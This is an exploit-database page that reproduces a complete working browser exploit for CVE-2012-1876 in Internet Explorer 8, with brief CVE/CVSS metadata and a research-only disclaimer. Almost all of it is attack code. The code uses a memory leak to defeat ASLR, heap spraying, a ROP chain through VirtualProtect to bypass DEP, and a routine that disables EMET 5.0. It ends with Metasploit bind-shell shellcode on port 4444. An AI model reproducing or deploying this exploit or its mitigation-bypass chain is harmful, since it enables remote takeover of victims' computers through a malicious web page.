Advertisement






Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

CVE Category Price Severity
CVE-2012-1876 CWE-Other N/A High
Author Risk Exploitation Type Date
Unknown Critical Remote 2014-10-01
CPE
cpe:cpe:/a:microsoft:internet_explorer:8
CVSS EPSS EPSSP
CVSS:4.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2014090157

Below is a copy:

<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ 
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
-->
 
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
 
function strtoint(str) {
        return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
 
var free = "EEEE";
while ( free.length < 500 ) free += free;
 
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
 
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
 
var fr = new Array();
var al = new Array();
var bl = new Array();
 
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
 
for (var i=0; i < 500; i+=2) {
        fr[i] = free.substring(0, (0x100-6)/2);
        al[i] = string1.substring(0, (0x100-6)/2);
        bl[i] = string2.substring(0, (0x100-6)/2);
        var obj = document.createElement("button");
        div_container.appendChild(obj);
}
 
for (var i=200; i<500; i+=2 ) {
        fr[i] = null;
        CollectGarbage();
}
 
function heapspray(cbuttonlayout) {
    CollectGarbage();
    var rop = cbuttonlayout + 4161; // RET
    var rop = rop.toString(16);
    var rop1 = rop.substring(4,8);
    var rop2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 11360; // POP EBP
    var rop = rop.toString(16);
    var rop3 = rop.substring(4,8);
    var rop4 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
    var rop = rop.toString(16);
    var rop5 = rop.substring(4,8);
    var rop6 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12377; // POP EBX
    var rop = rop.toString(16);
    var rop7 = rop.substring(4,8);
    var rop8 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 642768; // POP EDX
    var rop = rop.toString(16);
    var rop9 = rop.substring(4,8);
    var rop10 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 5504544; // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12462; // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 12043; // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 63776; // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 85751; // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 4936; // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 234657; // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4); // } RET
 
 
    var rop = cbuttonlayout + 408958; // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 2228408; // POP ECX
    var rop = rop.toString(16);
    var rop25 = rop.substring(4,8);
    var rop26 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 1586172; // POP EAX
    var rop = rop.toString(16);
    var rop27 = rop.substring(4,8);
    var rop28 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
    var rop = rop.toString(16);
    var rop29 = rop.substring(4,8);
    var rop30 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 1884912; // PUSH EAX
    var rop = rop.toString(16);
    var rop31 = rop.substring(4,8);
    var rop32 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
    var rop = rop.toString(16);
    var rop33 = rop.substring(4,8);
    var rop34 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
    var rop = rop.toString(16);
    var rop35 = rop.substring(4,8);
    var rop36 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 5036248; // ADD ESP,0C
    var rop = rop.toString(16);
    var rop37 = rop.substring(4,8);
    var rop38 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
    var rop = rop.toString(16);
    var rop39 = rop.substring(4,8);
    var rop40 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI
    var rop = rop.toString(16);
    var rop41 = rop.substring(4,8);
    var rop42 = rop.substring(0,4); // } RET
 
    var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX
    var rop = rop.toString(16);
    var rop43 = rop.substring(4,8);
    var rop44 = rop.substring(0,4); // } RET
 
    var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
    var getmodulew = getmodulew.toString(16);
    var getmodulew1 = getmodulew.substring(4,8);
    var getmodulew2 = getmodulew.substring(0,4); // } RET
 
 
    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141"); // PADDING
 
    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
 
    // EMET disable part 0x01
    // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
    shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2);    // GetModuleHandleW Ptr
    shellcode+= unescape("%u"+rop29+"%u"+rop30);    // MOV EAX,DWORD PTR [EAX] # RETN
    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u10c4%u076d");           // EMET_STRING_PTR (GetModuleHandle argument)
    shellcode+= unescape("%ua84c%u000a");           // EMET_CONFIG_STRUCT offset
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
    shellcode+= unescape("%u10c0%u076d");           // MEM_ADDRESS_PTR (Store EMET base address here for later)
    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)
    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
    shellcode+= unescape("%u104c%u076d");           // Get fake DecodePointer argument from the stack and update it with the encoded value
    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop27+"%u"+rop28);    // POP EAX # RETN
    shellcode+= unescape("%u10c0%u076d");           // Get EMET base address Ptr
    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u80b0%u0004");           // Get DecodePointer offset from the stack
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN (DecodePointer in IAT)
    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop31+"%u"+rop32);    // PUSH EAX # RETN
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
    shellcode+= unescape("%u9090%u9090");           // Fake DecodePointer argument (Will be patched)
    shellcode+= unescape("%u10bc%u076d");           // MEM_ADDRESS_PTR (Store decoded pointer here here for later)
    shellcode+= unescape("%u"+rop39+"%u"+rop40);    // MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u0558%u0000");           // ROP Protections offset
    shellcode+= unescape("%u"+rop33+"%u"+rop34);    // ADD EAX,ECX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);    // POP ECX # RETN
    shellcode+= unescape("%u0000%u0000");           // NULL
    shellcode+= unescape("%u"+rop35+"%u"+rop36);    // MOV DWORD PTR [EAX],ECX # RETN
    // EMET disable part 0x01 end
 
    // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4);      // POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8);      // POP EBP
    shellcode+= unescape("%u1024%u0000");           // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10);     // POP EDX
    shellcode+= unescape("%u0040%u0000");           // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12);    // POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2);  // Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14);    // POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2);      // RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16);    // POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18);    // POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2);        // VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20);    // MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22);    // PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24);    // PUSH ESP
 
    // Store various pointers here
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u14eb");           // NOPs
    shellcode+= unescape("%u4242%u4242");           // Decoded CONFIG structure pointer
    shellcode+= unescape("%u4141%u4141");           // Store BaseAddress address on the *stack*
    shellcode+= "EMET";                             // EMET string
    shellcode+= unescape("%u0000%u0000");           // EMET string
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u9090");           // NOPs
    // Store various pointers here
 
    // EMET disable part 0x02
    // MOV     EAX,DWORD PTR DS:[076D10BCH]
    // MOV     ESI,DWORD PTR [EAX+518H]
    // SUB     ESP,2CCH
    // MOV     DWORD PTR [ESP],10010H
    // MOV     EDI,ESP
    // MOV     ECX,2CCH
    // ADD     EDI,4
    // SUB     ECX,4
    // XOR     EAX,EAX
    // REP STOS BYTE PTR ES:[EDI]
    // PUSH    ESP
    // PUSH    0FFFFFFFEH
    // CALL    ESI
    shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
                         "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
                         "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
                         "%ufe6a%ud6ff");
    shellcode+= unescape("%u9090%u9090");           // NOPs
    shellcode+= unescape("%u9090%u9090");           // NOPs
    // EMET disable part 0x02 end
 
    // Bind shellcode on 4444 :)
    // msf > generate -t js_le
    // windows/shell_bind_tcp - 342 bytes
    // http://www.metasploit.com
    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    // I would keep the shellcode the same size for better reliability :)
 
    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                             "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                             "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                             "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                             "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                             "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                             "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                             "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                             "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                             "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                             "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                             "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                             "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                             "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                             "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                             "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                             "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                             "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                             "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                             "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                             "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                             "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                             "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                             "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                             "%u006a%uff53%u41d5");
 
    // Total spray should be 1000
    var padding = unescape("%u9090");
    while (padding.length < 1000)
        padding = padding + padding;
    var padding = padding.substr(0, 1000 - shellcode.length);
 
    shellcode+= padding;
 
    while (shellcode.length < 100000)
        shellcode = shellcode + shellcode;
 
    var onemeg = shellcode.substr(0, 64*1024/2);
 
    for (i=0; i<14; i++) {
        onemeg += shellcode.substr(0, 64*1024/2);
    }
 
    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
 
    var spray = new Array();
 
    for (i=0; i<100; i++) {
        spray[i] = onemeg.substr(0, onemeg.length);
    }
}
 
function leak(){
        var leak_col = document.getElementById("132");
        leak_col.width = "41";
        leak_col.span = "19";
}
 
function get_leak() {
        var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
        str_addr = str_addr - 1410704;
        var hex = str_addr.toString(16);
        //alert(hex);
        setTimeout(function(){heapspray(str_addr)}, 50);
}
 
function trigger_overflow(){
        var evil_col = document.getElementById("132");
        evil_col.width = "1245880";
        evil_col.span = "44";
}
 
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
 
</script>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum